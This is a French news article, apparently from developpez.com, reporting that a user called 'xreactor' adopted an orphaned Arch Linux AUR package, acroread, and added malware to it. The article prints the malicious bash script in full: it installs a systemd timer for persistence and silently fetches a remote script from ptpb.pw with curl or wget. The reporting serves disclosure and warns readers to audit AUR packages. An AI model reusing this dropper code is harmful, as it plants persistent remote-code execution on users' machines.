
Pour bien comprendre pourquoi un incident de ce type peut se produire, il faut souligner que dans l’écosystème Arch Linux, chaque utilisateur a la possibilité de prendre le contrôle d’un paquetage sans mainteneur actif. C’est ce qui s’est produit ce weekend lorsque l’utilisateur « xreactor » est passé à l’action sur le package acroread qui, comme son nom laisse filtrer, sert de visionneuse de fichiers pdf. Au sein du commit, un script curl monté de sorte à provoquer le téléchargement d’ un certain fichier « ~x » à partir du site ptpb.pw. La manœuvre permet d’installer (sur le poste de la victime) un logiciel qui reconfigure systemd pour provoquer l’exécution d’un autre script au sein du fichier « ~x » de façon périodique. Le détail dans le code source du fichier « ~x » :
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | #!/bin/bash # get to the right location if [[ -n "$pkgdir" ]]; then cd "$pkgdir" else exit 0 fi be_silent() { "$@" >/dev/null 2>&1 } # systemd files SYSTEMD_TIMER="[Timer] OnCalendar=4d Persistent=true OnActiveSec=360 [Install] WantedBy=timers.target" SYSTEMD_SERVICE="[Unit] Type=simple ExecStart=/usr/lib/xeactor/u.sh" # write systemd files mkdir -p usr/lib/systemd/system mkdir -p etc/systemd/system/multi-user.target.wants echo "$SYSTEMD_SERVICE" > usr/lib/systemd/system/xeactor.service echo "$SYSTEMD_TIMER" > usr/lib/systemd/system/xeactor.timer ln -s /usr/lib/systemd/system/xeactor.timer etc/systemd/system/multi-user.target.wants/xeactor.timer # get the upload script mkdir -p usr/lib/xeactor if be_silent which curl; then curl -s https://ptpb.pw/~u > usr/lib/xeactor/u.sh elif be_silent which wget; then wget -qOusr/lib/xeactor/u.sh https://ptpb.pw/~u else exit 0 fi |
Attention, ne pas confondre le dépôt AUR avec le dépôt officiel Arch Build System (ABS). Les utilisateurs de tous bords sont les auteurs des paquetages disponibles au sein du premier tandis que le second tire ses contenus de sources fiables. D’ailleurs, l’équipe Arch Linux déconseille de procéder à l’installation d’un paquetage issu de l’AUR sans l’avoir passé au peigne fin.
Ce type d’incident n’est pas l’apanage de la distribution Arch Linux. En mai, des utilisateurs ont découvert un mineur de monnaie cryptographique logé au sein de l’Ubuntu Snap Store.
Sources : commit, signalement, sensortech
Et vous ?

Voir aussi :




Vous avez lu gratuitement 468 articles depuis plus d'un an.
Soutenez le club developpez.com en souscrivant un abonnement pour que nous puissions continuer à vous proposer des publications.
Soutenez le club developpez.com en souscrivant un abonnement pour que nous puissions continuer à vous proposer des publications.